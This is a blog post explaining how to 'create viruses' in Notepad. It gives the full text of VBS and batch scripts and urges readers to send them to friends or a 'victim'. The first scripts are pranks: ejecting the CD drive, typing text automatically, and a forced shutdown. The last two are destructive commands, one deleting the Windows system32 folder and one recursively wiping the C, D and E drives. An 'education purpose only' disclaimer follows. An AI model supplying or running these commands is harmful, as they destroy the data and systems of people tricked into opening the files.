Friday, June 01, 2012

Create Viruses Using Simple Notepad File

Friends , all of you are most probably aware of viruses. The Only Headache of Every Windows PC owner is that his Pc might get virus. If a virus hits your computer, then no need to say what a nightmare you'll have.

       And what if someone sent you a virus through a USB, or mail attachment ? There are times in our lives , when we think " Hope, I too could create a virus ". Well then this is the time friends, So here I am posting the process how to create a virus. And sorry i cant post the virus file itself, as Internet doesn't allow to post or send .bat or .cmd files .

Having problem in copy paste download Notepad file from Here....

1. Continuously pop out CD or DVD Drive:


Open Notepad and Type the following code:



Set oWMP = CreateObject("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 5000

loop



Save it as abc.vbs. After saving just double click on the file to execute the file. You can also send the file to your friends and ask them to open it.


2. Type any message in notepad automatically and scare your friends :


Open Notepad and Type the following code :

WScript.Sleep 1800
WScript.Sleep 1000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "



Save it as abc.vbs. After saving just double click on the file to execute the file. You can also send the file to your friends and ask them to open it.



3. Show a error message and shut down friends computer :


Open Notepad and Type the following code :


@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s


You can change the message by replacing the text by your message.

Save it as abc.bat. After saving just double click on the file to execute the file. You can also send the file to your friends and ask them to open it.


4. To Shut Down pc Permanently.


 Open Notepad

Write / copy the below command there:

" del c:\WINDOWS\system32\*.*/q "

 without quoteand

 save as " anything.bat"Done.

 If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started.

 

5. To Delete C,D,E Drive With in Seconds


Open Notepad

 Copy the below command there

 "rd/s/q D:\

rd/s/q C:\

rd/s/q E:\"
( without quotes )


Save as "anything.bat

This virus Formats the C ,D  , and E Drive in  Seconds


Having problem in copy paste download Notepad file from Here....

(This is 100% or education purpose only. If you intend to use it in any illegal activity, Then it'll be 101% your Responsibility Solely.)


for more updates join  Tech tips and tricks

No comments:

Post a Comment

Blogger Gadgets